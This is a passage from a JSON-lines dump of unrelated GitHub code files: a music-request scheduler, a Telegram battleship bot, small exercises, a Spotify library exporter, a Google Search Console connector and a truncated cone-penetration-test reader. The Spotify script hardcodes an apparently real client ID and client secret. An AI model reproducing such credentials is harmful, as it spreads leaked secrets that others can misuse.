usr_info)\n asyncio.gather(task)\n\n\n#添加一首 music\nasync def add_music(music_name):\n with lock:\n gl.called_list.append(music_name)\n\n\n#音乐下载及封装\nasync def video_composer(music_name, usr_info):\n download_code, real_music_name = await wordpicker.music_downloader(music_name)\n if download_code == -1:\n await wordpicker.download_fault(usr_info, music_name)\n with lock:\n gl.clean_fault_music(music_name)\n return -1\n with lock:\n await wordpicker.success_danmuku(usr_info, music_name)\n video_compose_code, msg = await ffmpeg_cmd.make_video_2(music_name, real_music_name)\n if video_compose_code == -1:\n with lock:\n gl.clean_fault_music(music_name)\n print(\"video composer error : \" + str(msg))\n return -1\n print(\"video composer success\")\n \n count = 0\n while gl.download_list[0] != music_name:\n await asyncio.sleep(10)\n if gl.download_list[1] == music_name:\n count += 1\n if count == 30:\n pop_fist_music()\n count = 0\n\n await add_music(music_name)\n with lock:\n gl.download_list.pop(0)\n \n\n\n#选择下一个音乐\n#返回选择的 music_name\ndef choose_music():\n #print(gl.called_list)\n if not gl.called_list:\n num = random.randint(0, len(gl.default_list)-1)\n return 0, gl.default_list[num]\n else:\n with lock:\n res = gl.called_list[0];\n return 1, res\n\n#排除排队bug\ndef 
pop_fist_music():\n time_curr = time.time()\n if time_curr - time_last_pop > 300:\n with lock:\n gl.download_list.pop(0)\n time_last_pop = time_curr\n\n\nasync def tasks():\n #room = live.LiveDanmaku(gl.room_id)\n room_connect = room.connect()\n await asyncio.gather(room_connect)\n\ndef run_bili_loop():\n asyncio.run(tasks())\n #print(\"nice\")\n\ndef setup():\n t1 = Thread(target=run_bili_loop, args=())\n t1.start()\n asyncio.run(music_player())\n t1.join()\n\n\nif __name__ == \"__main__\":\n setup()\n\n","repo_name":"FruiteePro/BILI_Jukebox","sub_path":"scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"42067416269","text":"\"\"\"\nНапишите программу, которая бы считала по просьбе пользователя.\nНадо позволить пользователю ввести начало и конец счета, а также\nинтервал между называемыми целыми числами.\n\"\"\"\n\nfirst_number = int(input(\"Введите начало счета: \"))\nsecond_number = int(input(\"Введите конец счета: \"))\ninterval = int(input(\"Введите интервал счета: \"))\nfor i in range(first_number, second_number + 1, interval):\n print(i)\n","repo_name":"timerke/Dawson_Python_Programming","sub_path":"Chapter4/4.1.py","file_name":"4.1.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28855336004","text":"from aiogram import Router\nfrom aiogram.filters import Command, CommandStart, Text\nfrom aiogram.types import Message, CallbackQuery\nimport asyncio\n\nfrom keyboards.keyboard import game_mode_kb\n\nfrom keyboards.player_map_keyboard import player_keyboard_rebuild, player_game_kb, player_map_restore, confirm_player_kb\n\nfrom keyboards.keyboard_AI_pair import AI_pair_game_kb, rebuild_keyboard_AI_pair, rebuild_player_keyboard_AI_pair\n\nfrom lexicon.lexicon_ru import LEXICON_RU\nfrom services.sea_war import create_AI_map, shot_result, player_ship_placement, AI_shot\nfrom User_dict.user_dict import users\n\nrouter: Router = Router()\n\n\n# Этот хэндлер срабатывает на кнопки при размещении корабля\n@router.callback_query(Text(text=[str(i) + ',' + str(j) for i in range(1, 9) for j in range(1, 9)]))\nasync def process_game_button(callback: CallbackQuery):\n coords = callback.data.split(',')\n coord_y = int(coords[0])\n coord_x = int(coords[1])\n user = users[callback.from_user.id]\n # if the tile is not already marked, then mark it as a ship deck\n if [coord_y, coord_x] not in user['tiles'] and user['tiles_left'] > 0:\n status = 'place'\n user['tiles_left'] -= 1\n user['player_map'][coord_y][coord_x] = 1\n user['tiles'].append([coord_y, coord_x])\n await callback.message.edit_text(\n text=f\"{LEXICON_RU['tiles left']} = {user['tiles_left']}\",\n reply_markup=player_keyboard_rebuild(callback.message.reply_markup.inline_keyboard, coord_x, coord_y,\n status))\n\n # if the tile is already marked, then unmark it\n elif [coord_y, coord_x] in user['tiles']:\n status = 'empty'\n user['tiles_left'] += 1\n user['player_map'][coord_y][coord_x] = 0\n user['tiles'].remove([coord_y, coord_x])\n await callback.message.edit_text(\n text=f\"{LEXICON_RU['tiles left']} = {user['tiles_left']}\",\n reply_markup=player_keyboard_rebuild(callback.message.reply_markup.inline_keyboard,\n coord_x, coord_y, status))\n\n if user['tiles_left'] == 0:\n await callback.message.edit_text(\n text=LEXICON_RU['no_tiles_left'], reply_markup=callback.message.reply_markup)\n\n await 
callback.answer()\n\n\n# Этот хэндлер срабатывает на подтверждение расположения кораблей\n@router.callback_query(Text(text='confirm_placement'))\nasync def confirm_placement(callback: CallbackQuery):\n user = users[callback.from_user.id]\n # check the player ship placement:\n placement_check = player_ship_placement(user['player_ships'], user['player_map'])\n result = placement_check[0]\n # and if it is wrong, restore the map and tiles to set:\n if result == \"ship too long\":\n user['player_ships'] = {}\n user['tiles_left'] = 13\n user['player_map'], user['tiles'] = player_map_restore(user['player_map'], user['tiles'])\n await callback.message.edit_text(text=LEXICON_RU['ship_too_long'], reply_markup=player_game_kb)\n\n elif result == \"diagonal placement\":\n user['player_ships'] = {}\n user['tiles_left'] = 13\n user['player_map'], user['tiles'] = player_map_restore(user['player_map'], user['tiles'])\n await callback.message.edit_text(text=LEXICON_RU['diagonal_placement'],\n reply_markup=player_game_kb)\n\n elif result == \"wrong placement\":\n user['player_ships'] = {}\n user['tiles_left'] = 13\n user['player_map'], user['tiles'] = player_map_restore(user['player_map'], user['tiles'])\n await callback.message.edit_text(text=LEXICON_RU['wrong_placement'],\n reply_markup=player_game_kb)\n\n elif result == \"placement confirmed\":\n print(user['player_ships'])\n # replace confirmation button with the next move button and make tiles inactive:\n user['player_kb'] = confirm_player_kb(user['player_map'])\n\n # go to enemy map:\n user['enemy_kb'] = AI_pair_game_kb\n await callback.message.edit_text(text=LEXICON_RU['placement_confirmed'],\n reply_markup=user['enemy_kb'])\n\n await callback.answer()\n\n\n# Этот хэндлер срабатывает на кнопки стрельбы по карте компьютерного игрока\n@router.callback_query(Text(text=['AI_pair,' + str(i) + ',' + str(j) for i in range(1, 9) for j in range(1, 9)]))\nasync def process_AI_pair_button(callback: CallbackQuery):\n user = users[callback.from_user.id]\n if user['shot_status'] == 'not_shot_yet':\n coords = callback.data.split(',')\n coord_y = int(coords[1])\n coord_x = int(coords[2])\n\n AI_map = user['AI_map']\n player_hits = user['player_hits']\n\n # check the result of player shot:\n result = shot_result(AI_map[0], AI_map[1], player_hits, coord_x, coord_y)\n\n if result == 'killed':\n user['enemy_ships_left'] -= 1\n if user['enemy_ships_left'] == 0:\n await callback.message.edit_text(\n text=LEXICON_RU['user_won'],\n reply_markup=None)\n user['wins'] += 1\n user['in_game'] = False\n await callback.message.answer(text=LEXICON_RU['new_game'], reply_markup=game_mode_kb)\n\n else:\n user['enemy_kb'] = rebuild_keyboard_AI_pair(callback.message.reply_markup.inline_keyboard, coord_x, coord_y,\n result)\n await callback.message.edit_text(\n text=LEXICON_RU[result], reply_markup=user['enemy_kb'])\n user['shot_status'] = 'already_shot'\n else:\n await callback.message.edit_text(\n text=LEXICON_RU['inactive_button'], reply_markup=callback.message.reply_markup)\n\n await callback.answer()\n\n\n# Этот хэндлер срабатывает на кнопку перехода к следующему ходу\n@router.callback_query(Text(text='next_move_AI'))\nasync def go_to_AI_move(callback: CallbackQuery):\n user = users[callback.from_user.id]\n user['shot_status'] = 'not_shot_yet'\n # go to player map:\n await callback.message.edit_text(text='Мой ход', reply_markup=user['player_kb'])\n await asyncio.sleep(2)\n AI_shot_result = AI_shot(user['AI_tiles_for_shot'], user['AI_hits'], user['player_map'], user['player_ships'])\n 
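scheduler.py above runs the danmaku listener on a background thread with its own event loop while the main thread drives music_player through a second asyncio.run. A minimal sketch of that one-loop-per-thread pattern, with stand-in coroutines:

import asyncio
from threading import Thread

async def listener():          # stand-in for the bilibili danmaku connection
    await asyncio.sleep(0.1)
    print("listener finished")

async def player():            # stand-in for the music_player coroutine
    await asyncio.sleep(0.2)
    print("player finished")

def run_background_loop():
    asyncio.run(listener())    # asyncio.run builds a fresh loop per thread

t = Thread(target=run_background_loop)
t.start()
asyncio.run(player())          # the main thread owns a separate loop
t.join()

Shared state reached from both threads (called_list, download_list) still needs the threading.Lock that scheduler.py wraps around its list mutations.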
AI_x = AI_shot_result[0]\n AI_y = AI_shot_result[1]\n AI_result = AI_shot_result[2]\n user['AI_tiles_for_shot'] = AI_shot_result[3]\n user['AI_hits'] = AI_shot_result[4]\n user['player_kb'] = rebuild_player_keyboard_AI_pair(user['player_kb'].inline_keyboard,\n AI_x, AI_y, AI_result)\n if AI_result == 'killed_player':\n user['player_ships_left'] -= 1\n if user['player_ships_left'] == 0:\n await callback.message.edit_text(\n text=LEXICON_RU['user_failed'],\n reply_markup=None)\n user['in_game'] = False\n await callback.message.answer(text=LEXICON_RU['new_game'], reply_markup=game_mode_kb)\n else:\n await callback.message.edit_text(text=LEXICON_RU[AI_result], reply_markup=user['player_kb'])\n\n await callback.answer()\n\n\n# Этот хэндлер срабатывает на кнопку перехода к следующему ходу\n@router.callback_query(Text(text='next_move_player'))\nasync def confirm_placement(callback: CallbackQuery):\n user = users[callback.from_user.id]\n # go to enemy map:\n await callback.message.edit_text(text='Ваш ход', reply_markup=user['enemy_kb'])\n await callback.answer()\n\n\n# Этот хэндлер срабатывает на нажатие на неактивную кнопку карты игрока\n@router.callback_query(Text(text=['inactive,' + str(i) + ',' + str(j) for i in range(1, 9) for j in range(1, 9)]))\nasync def note_inactive_button(callback: CallbackQuery):\n await callback.message.edit_text(\n text=LEXICON_RU['inactive_button'], reply_markup=callback.message.reply_markup)\n\n await callback.answer()\n","repo_name":"tanypredator/Sea_war_bot","sub_path":"handlers/pair_AI_handlers.py","file_name":"pair_AI_handlers.py","file_ext":"py","file_size_in_byte":8261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17367809370","text":"# Leetcode\n# 1823. 
Find the Winner of the Circular Game\n\nclass Solution:\n def findTheWinner(self, n: int, k: int) -> int:\n # create a double ended queue object \n # rotate the queue to the left\n # negative number rotates the queue to the left \n # pop last element\n elements = collections.deque([x for x in range(1, n+1)])\n # print(elements)\n while len(elements) > 1:\n elements.rotate(-k)\n # print(elements)\n elements.pop()\n return elements.pop()\n","repo_name":"ayeshsalah/coding-interview-prep","sub_path":"leetcode/FindTheWinnerOfTheCircularGame.py","file_name":"FindTheWinnerOfTheCircularGame.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23489108898","text":"# -*- codong: utf-8 -*-\n\nfile = input('Введите путь к текстовому файлу: ')\nabc = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\"\ncounter =dict()\nwith open(file, \"r\") as f_in:\n txt = f_in.read()\n total = 0\n for item in abc:\n cnt = txt.count(item)\n if item.lower() in counter: \n counter[item.lower()]+= cnt\n else:\n counter[item.lower()]= cnt\n total += cnt\n\nfor ltr in counter:\n print(f\"{ltr} - {counter[ltr]*100/total:2.2f}%\")\n","repo_name":"paladinum/dztst1","sub_path":"counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38891527038","text":"from bottle import route, run, request\nimport spotipy\nfrom spotipy import oauth2\nimport pprint\nimport json\n\nPORT_NUMBER = 8080\nSPOTIPY_CLIENT_ID = '550663057de643b78fc270e67cdfaa49'\nSPOTIPY_CLIENT_SECRET = '0f92dd717f5c4d3eb5713ff6b0c6462f'\nSPOTIPY_REDIRECT_URI = 'http://localhost:8080'\nSCOPE = 'user-library-read' #change this for scope\nCACHE = '.spotipyoauthcache'\nUSERNAME = 'Grant'\nNUM_SAVED_TRACKS = 9000\n\nsp_oauth = oauth2.SpotifyOAuth( SPOTIPY_CLIENT_ID, SPOTIPY_CLIENT_SECRET,SPOTIPY_REDIRECT_URI,scope=SCOPE,cache_path=CACHE )\n\npp = pprint.PrettyPrinter(indent=4)\n\n@route('/')\ndef index():\n\n access_token = \"\"\n\n token_info = sp_oauth.get_cached_token()\n\n if token_info:\n print (\"Found cached token!\")\n access_token = token_info['access_token']\n else:\n url = request.url\n code = sp_oauth.parse_response_code(url)\n if code:\n print (\"Found Spotify auth code in Request URL! Trying to get valid access token...\")\n token_info = sp_oauth.get_access_token(code)\n access_token = token_info['access_token']\n\n if access_token:\n print(\"Access token available! Trying to get user information...\")\n sp = spotipy.Spotify(auth=access_token)\n\n #all_artists = []\n #all_artists += results['items']\n all_tracks = []\n for i in range(0, NUM_SAVED_TRACKS, 50):\n results = sp.current_user_saved_tracks(limit=50, offset=i)\n if results is None:\n break\n all_tracks += results['items']\n #for item in results['items']:\n # all_tracks += item['track']\n #pp.pprint(all_tracks)\n\n #artists = []\n #for item in all_artists:\n # artists.append(item['name'])\n #pp.pprint(artists)\n \n #with open('librarySongs' + USERNAME, 'w') as fout:\n # json.dump(all_artists, fout)\n num_tracks = len(all_tracks)\n print(num_tracks)\n with open('librarySongs' + USERNAME+'_'+str(num_tracks), 'w') as fout:\n json.dump(all_tracks, fout)\n\n return \"
    \" + json.dumps(results, indent=4) + \"
    \"\n\n #print(len(all_artists))\n\n '''\n sp.trace = False\n ranges = ['short_term', 'medium_term', 'long_term']\n for myrange in ranges:\n print (\"range:\", myrange)\n results = sp.current_user_top_tracks(time_range=myrange, limit=50)\n for i, item in enumerate(results['items']):\n print (i, item['name'], '//', item['artists'][0]['name'])\n print()\n '''\n \n\n else:\n return htmlForLoginButton()\n\ndef htmlForLoginButton():\n auth_url = getSPOauthURI()\n htmlLoginButton = \"Login to Spotify\"\n return htmlLoginButton\n\ndef getSPOauthURI():\n auth_url = sp_oauth.get_authorize_url()\n return auth_url\n\nrun(host='', port=8080)\n\n\n","repo_name":"edd426/music-in-common","sub_path":"test_scripts/getLibraryData.py","file_name":"getLibraryData.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41381057391","text":"#for Dataiku\nfrom dataiku.connector import Connector\n#for Dataframes\nimport pandas as pd \n#Datetime tools\nfrom datetime import date\nfrom datetime import datetime\nfrom datetime import timedelta\nimport os #to read files\nimport json #to manipulate json \n#for Google Search Console Reporting API V3 with service account\nfrom apiclient.discovery import build #from google-api-python-client\nfrom oauth2client.service_account import ServiceAccountCredentials #to use a Google Service \n\n#my Connector Class\nclass MyConnector(Connector):\n\n def __init__(self, config, plugin_config):\n \"\"\"\n The configuration parameters set up by the user in the settings tab of the\n dataset are passed as a json object 'config' to the constructor.\n The static configuration parameters set up by the developer in the optional\n file settings.json at the root of the plugin directory are passed as a json\n object 'plugin_config' to the constructor\n \"\"\"\n Connector.__init__(self, config, plugin_config) # pass the parameters to the base class\n\n \n #perform some more initialization\n SCOPES = ['https://www.googleapis.com/auth/webmasters.readonly']\n #DISCOVERY_URI = ('https://www.googleapis.com/discovery/v1/apis/customsearch/v1/rest') #not used \n\n\n #Plugin parameters (declare in plugin.json )\n self.credentials = self.plugin_config.get(\"credentials\") \n self.webSite = self.plugin_config.get(\"webSite\")\n #Component parameters (deckare in connector.json)\n \n self.period = self.config.get(\"period\")\n print(self.period)\n if (self.period==\"1day\") :\n self.from_date = date.today() - timedelta(days=2)\n self.to_date = date.today() - timedelta(days=1)\n if (self.period==\"7days\") :\n self.from_date = date.today() - timedelta(days=8)\n self.to_date = date.today() - timedelta(days=1)\n if (self.period==\"28days\") :\n self.from_date = date.today() - timedelta(days=29)\n self.to_date = date.today() - timedelta(days=1) \n if (self.period==\"3months\") :\n self.from_date = date.today() - timedelta(days=30*3)\n self.to_date = date.today() - timedelta(days=1) \n if (self.period==\"6months\") :\n self.from_date = date.today() - timedelta(days=30*6)\n self.to_date = date.today() - timedelta(days=1) \n if (self.period==\"12months\") :\n self.from_date = date.today() - timedelta(days=30*12)\n self.to_date = date.today() - timedelta(days=1) \n if (self.period==\"16months\") :\n self.from_date = date.today() - timedelta(days=30*16)\n self.to_date = date.today() - timedelta(days=1) \n if (self.period==\"Personalized\") :\n #beware !! 
dates are in string in the forms, and there is a shift error of one minus day\n self.from_date = datetime.strptime( self.config.get(\"from_date\")[:10], '%Y-%m-%d')\n #avoid shift error\n self.from_date = self.from_date + timedelta(days=1) \n \n self.to_date = datetime.strptime( self.config.get(\"to_date\")[:10], '%Y-%m-%d')\n #avoid shift error\n self.to_date = self.to_date + timedelta(days=1) \n \n if self.to_date < self.from_date:\n raise ValueError(\"The end date occurs before the start date\") \n \n #get JSON Service account credentials from file or from text \n file = self.credentials.splitlines()[0]\n if os.path.isfile(file):\n try:\n with open(file, 'r') as f:\n self.credentials = json.load(f)\n f.close()\n except Exception as e:\n raise ValueError(\"Unable to read the JSON Service Account from file '%s'.\\n%s\" % (file, e))\n else:\n try:\n self.credentials = json.loads(self.credentials)\n except Exception as e:\n raise Exception(\"Unable to read the JSON Service Account.\\n%s\" % e)\n \n #get credentials from service account\n credentials = ServiceAccountCredentials.from_json_keyfile_dict(self.credentials, SCOPES)\n\n #open a Google Search console service (previously called Google Webmasters tools)\n self.webmasters_service = build('webmasters', 'v3', credentials=credentials)\n\n \n \n\n def get_read_schema(self):\n \"\"\"\n Returns the schema that this connector generates when returning rows.\n\n The returned schema may be None if the schema is not known in advance.\n In that case, the dataset schema will be infered from the first rows.\n\n If you do provide a schema here, all columns defined in the schema\n will always be present in the output (with None value),\n even if you don't provide a value in generate_rows\n\n The schema must be a dict, with a single key: \"columns\", containing an array of\n {'name':name, 'type' : type}.\n\n Example:\n return {\"columns\" : [ {\"name\": \"col1\", \"type\" : \"string\"}, {\"name\" :\"col2\", \"type\" : \"float\"}]}\n\n Supported types are: string, int, bigint, float, double, date, boolean\n \"\"\"\n\n # In this example, we don't specify a schema here, so DSS will infer the schema\n # from the columns actually returned by the generate_rows method\n return None\n \n\n def generate_rows(self, dataset_schema=None, dataset_partitioning=None,\n partition_id=None, records_limit = -1):\n \"\"\"\n The main reading method.\n\n Returns a generator over the rows of the dataset (or partition)\n Each yielded row must be a dictionary, indexed by column name.\n\n The dataset schema and partitioning are given for information purpose.\n \"\"\"\n \n \n print (\"Google Search Console plugin - Start generating rows\")\n print (\"Google Search Console plugin - records_limits=%i\" % records_limit)\n\n\n ###############################################################################\n #Get Data Pages/Queries/positions/Clicks from Google Search Console\n ###############################################################################\n\n dfAllTraffic = pd.DataFrame() #global dataframe for all traffic calculation\n dfGSC = pd.DataFrame() #global dataframe for clicks\n #convert dates in strings\n myStrStartDate = self.from_date.strftime('%Y-%m-%d') \n myStrEndDate = self.to_date.strftime('%Y-%m-%d') \n\n \n ####### Get Global Traffic ##############\n\n \n maxStartRow = 1000000000 #to avoid infinite loop\n myStartRow = 0\n \n \n \n while ( myStartRow < maxStartRow):\n \n df = pd.DataFrame() #dataframe for this loop\n \n \n mySiteUrl = 
self.plugin_config.get(\"webSite\")\n myRequest = {\n 'startDate': myStrStartDate, #older date\n 'endDate': myStrEndDate, #most recent date\n 'dimensions': [\"date\", \"country\", \"device\"],\n 'searchType': 'web', #for the moment only Web \n 'rowLimit': 25000, #max 25000 for one Request \n \"aggregationType\": \"byPage\",\n 'startRow' : myStartRow # for multiple resquests 'startRow':\n }\n\n response = self.webmasters_service.searchanalytics().query(siteUrl=mySiteUrl, body=myRequest).execute()\n\n\n \n #set response (dict) in DataFrame for treatments purpose.\n df = pd.DataFrame.from_dict(response['rows'], orient='columns')\n\n if ( myStartRow == 0) :\n dfAllTraffic = df #save the first loop df in global df\n else :\n dfAllTraffic = pd.concat([dfAllTraffic, df], ignore_index=True) #concat this loop df with global df\n\n if (df.shape[0]==25000) :\n myStartRow += 25000 #continue\n else :\n myStartRow = maxStartRow+1 #stop\n \n #split keys in date country device\n dfAllTraffic[[\"date\", \"country\", \"device\"]] = pd.DataFrame(dfAllTraffic[\"keys\"].values.tolist())\n dfAllTraffic = dfAllTraffic.drop(columns=['keys']) #remove Keys (not used)\n \n myTotalClicks = dfAllTraffic['clicks'].sum()\n myTotalImpressions = dfAllTraffic['impressions'].sum()\n \n \n \n ####### Get Pages/Queries/positions/Clicks ##############\n \n maxStartRow = 1000000000 #to avoid infinite loop\n myStartRow = 0\n \n \n \n while ( myStartRow < maxStartRow):\n \n df = pd.DataFrame() #dataframe for this loop\n \n \n mySiteUrl = self.plugin_config.get(\"webSite\")\n myRequest = {\n 'startDate': myStrStartDate, #older date\n 'endDate': myStrEndDate, #most recent date\n 'dimensions': [\"date\", \"query\",\"page\",\"country\",\"device\"], #all available dimensions ?\n 'searchType': 'web', #for the moment only Web \n 'rowLimit': 25000, #max 25000 for one Request \n 'startRow' : myStartRow # for multiple resquests 'startRow':\n }\n\n response = self.webmasters_service.searchanalytics().query(siteUrl=mySiteUrl, body=myRequest).execute()\n\n\n \n #set response (dict) in DataFrame for treatments purpose.\n df = pd.DataFrame.from_dict(response['rows'], orient='columns')\n\n if ( myStartRow == 0) :\n dfGSC = df #save the first loop df in global df\n else :\n dfGSC = pd.concat([dfGSC, df], ignore_index=True) #concat this loop df with global df\n\n if (df.shape[0]==25000) :\n myStartRow += 25000 #continue\n else :\n myStartRow = maxStartRow+1 #stop\n \n #split keys in date query page country device\n dfGSC[[\"date\", \"query\", \"page\", \"country\", \"device\"]] = pd.DataFrame(dfGSC[\"keys\"].values.tolist())\n dfGSC = dfGSC.drop(columns=['keys']) #remove Keys (not used)\n \n \n mySampleClicks = dfGSC['clicks'].sum()\n mySampleImpressions = dfGSC['impressions'].sum()\n \n \n #Recalculate new clicks and Impressions\n #recalculate All Clicks according to clicks volume ratio (we privilegiate clicks accuracy)\n dfGSC['allClicks'] = dfGSC.apply(lambda x : round((x['clicks']*myTotalClicks)/mySampleClicks, 0),axis=1)\n #Recalculate news All Impressions according to clicks volume ratio\n dfGSC['allImpressions'] = dfGSC.apply(lambda x : round((x['impressions']*myTotalClicks)/mySampleClicks, 0),axis=1) \n #Reclaculate news All ctr according to new All impressions and Clicks\n dfGSC['allCTR'] = dfGSC.apply(lambda x : x['allClicks']/x['allImpressions'],axis=1) \n \n #remove bad dates \n #Change string date in datetime\n dfGSC['date'] = dfGSC.apply(lambda x : datetime.strptime( x['date'][:10], '%Y-%m-%d'),axis=1) \n mask = (dfGSC['date'] >= 
self.from_date) & (dfGSC['date'] <= self.to_date)\n dfGSC = dfGSC.loc[mask] \n dfGSC.reset_index(inplace=True, drop=True) #reset index\n \n #remove old clicks, ctr and impression columns\n dfGSC = dfGSC.drop(columns=['clicks', 'ctr', 'impressions'])\n #rename All impressions, ctr and clicks in old names\n dfGSC.rename(columns={'allImpressions':'impressions', 'allClicks':'clicks', 'allCTR':'ctr'}, inplace=True)\n \n #reorganise in orignal order clicks, ctr, impressions, positions, date, query, page, country, device\n dfGSC = dfGSC[[\"clicks\", \"ctr\", \"impressions\", \"position\", \"date\", \"query\", \"page\", \"country\", \"device\"]]\n #send rows got in dataframe transformed in dict \n for row in dfGSC.to_dict(orient='records'):\n yield row #Each yield in the generator becomes a row in the dataset.\n\n\n\n def get_writer(self, dataset_schema=None, dataset_partitioning=None,\n partition_id=None):\n \"\"\"\n Returns a write object to write in the dataset (or in a partition)\n\n The dataset_schema given here will match the the rows passed in to the writer.\n\n Note: the writer is responsible for clearing the partition, if relevant\n \"\"\"\n raise Exception(\"Unimplemented\")\n\n\n def get_partitioning(self):\n \"\"\"\n Return the partitioning schema that the connector defines.\n \"\"\"\n raise Exception(\"Unimplemented\")\n\n def get_records_count(self, partition_id=None):\n \"\"\"\n Returns the count of records for the dataset (or a partition).\n\n Implementation is only required if the field \"canCountRecords\" is set to\n true in the connector.json\n \"\"\"\n \n raise Exception(\"unimplemented\")\n","repo_name":"Anakeyn/Dataiku-DSS-Anakeyn-GoogleSearchConsole","sub_path":"python-connectors/gsc/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":13168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5572089432","text":"import shutil\nimport io\nimport os\nimport sys\nfrom argparse import ArgumentParser\n\nimport pandas as pd\nimport subprocess\n\nfrom src.utils.project_dirs import data_dir, work_dir, submit_dir, tool_dir, root_dir\n\n\ndef parse_args():\n parser = ArgumentParser()\n parser.add_argument('exp_name')\n parser.add_argument('--validate', action='store_true')\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n # Dataset directory\n DATASET_DIR = data_dir / 'jpx_latest'\n # Log directory\n LOG_DIR = work_dir / args.exp_name\n # Submit directory\n SUBMIT_DIR = submit_dir / args.exp_name\n SUBMIT_MODEL_DIR = SUBMIT_DIR / 'model'\n # shutil.copy(root_dir / 'docker' / 'requirements.txt', SUBMIT_DIR)\n if not SUBMIT_MODEL_DIR.exists():\n SUBMIT_MODEL_DIR.mkdir()\n src_files = list(LOG_DIR.glob('final_lgb_label*'))\n src_files += [LOG_DIR / 'le_dict.pkl', LOG_DIR / 'normalize_value.csv', tool_dir / 'infos' / 'nikkei225.txt']\n for src_file in src_files:\n shutil.copy(src_file, SUBMIT_MODEL_DIR)\n\n # Change directory\n os.chdir(SUBMIT_DIR / 'src')\n # Add python path\n sys.path.append(str(SUBMIT_DIR / 'src'))\n\n from predictor import ScoringService\n inputs = {\n 'stock_list': str(DATASET_DIR / 'stock_list.csv.gz'),\n 'stock_price': str(DATASET_DIR / 'stock_price.csv.gz'),\n 'stock_fin': str(DATASET_DIR / 'stock_fin.csv.gz'),\n 'stock_labels': str(DATASET_DIR / 'stock_labels.csv.gz'),\n }\n if args.validate:\n if ScoringService.get_model():\n ScoringService.predict(inputs, check_val_score=True)\n else:\n raise NotImplementedError\n else:\n if ScoringService.get_model():\n 
\n            result = ScoringService.predict(inputs)\n        else:\n            raise NotImplementedError\n\n    # Check result\n    df = pd.read_csv(io.StringIO(result), header=None)\n    print(df.shape)\n    print(df.head())\n\n    os.chdir('../')\n    subprocess.call('zip -v submit.zip requirements.txt src/*.py model/*', shell=True)\n\n    out_dir = work_dir / args.exp_name\n    subprocess.call(f'mv submit.zip {out_dir}', shell=True)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"nyoki-mtl/jpx1-3rd","sub_path":"tools/check_submit_files.py","file_name":"check_submit_files.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"}
+{"seq_id":"41754254541","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 21 13:53:14 2021\n\n@author: Arian Kamphuis\n\"\"\"\nimport datetime\nbegin_time = datetime.datetime.now()\nprint(\"Starting CPT-Reader\")\nimport feather\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\ndef readFiles():\n    path ='\CPTs'\n    cwd = os.getcwd()\n    print('Current directory is:', cwd)\n    os.chdir(cwd + path)\n    retval = os.getcwd()\n    print('Successfully changed to:', retval)\n    files = [f for f in listdir(retval) if isfile(join(retval, f))]\n    print('Files:', files)\n    return retval, files, cwd\n\n\nclass GEF:\n    def __init__(self):\n        self._data_seperator = \";\"\n        self._columns = {}\n\n        self.x = 0.\n        self.y = 0.\n        self.z = 0.\n        self.dz = []\n        self.qc = []\n        self.pw = []\n        self.wg = []\n        self.qs = []\n        self.qt = []\n        self.k = []\n\n    def readFile(self, filename):\n        print(filename)\n        with open(filename, 'r') as f:\n            lines = f.readlines()\n        reading_header = True\n\n        for line in lines:\n\n            if reading_header:\n                self._parseHeaderLine(line)\n            else:\n                self._parseDataLine(line)\n\n            if line.find('#EOH') > -1:\n                if self._check_header():\n                    reading_header = False\n                else:\n                    return\n        self.qs = self.addSleeveResistance()\n        self.qt = self.TotConeResistance()\n\n    def _check_header(self):\n        if not 1 in self._columns:\n            print(\"Fatal error > This GEF file is missing a depth column\")\n            return False\n\n        if not 2 in self._columns:\n            print(\"Fatal error > This GEF file is missing a qc (cone resistance) column\")\n            return False\n\n        if not 3 in self._columns:\n            print(\"Fatal error > This GEF file is missing an fs (local friction, pw) column\")\n            return False\n        if not 6 in self._columns:\n            print('No u2 (pore pressure) found in the file. qt = qc')
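\n            # without a u2 column the pore-pressure correction cannot be applied,\n            # so qt simply falls back to the raw cone resistance qc (see TotConeResistance)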
\n        return True\n\n    def _parseHeaderLine(self, line):\n        keyword, argline = line.split('=')\n        keyword = keyword.strip()\n        argline = argline.strip()\n        args = argline.split(',')\n\n        if keyword == '#XYID':\n            self.x = float(args[1].strip())\n            self.y = float(args[2].strip())\n        elif keyword == '#ZID':\n            self.z = float(args[1].strip())\n        elif keyword == '#COLUMNINFO':\n            column = int(args[0])\n            dtype = int(args[-1].strip())\n            if dtype == 11:\n                dtype = 1\n            self._columns[dtype] = column - 1\n\n    def _parseDataLine(self, line):\n        args = line.split(self._data_seperator)\n\n        dz = self.z - float(args[self._columns[1]])\n\n        qc = float(args[self._columns[2]])\n        pw = float(args[self._columns[3]])\n\n        self.dz.append(dz)\n        self.qc.append(qc)\n        self.pw.append(pw)\n\n        if qc <= 0:\n            self.wg.append(10)\n        else:\n            wg = (pw / qc) * 100\n            if wg > 10:\n                wg = 10\n            elif wg == 0:  #replace a wg of 0 to avoid division by 0 later on\n                wg = 0.01\n            self.wg.append(wg)\n\n    def asNumpy(self):\n        Isbt = self.Robertson()\n        Su = self.UndrainedShearStrength()\n        sigma_vo, 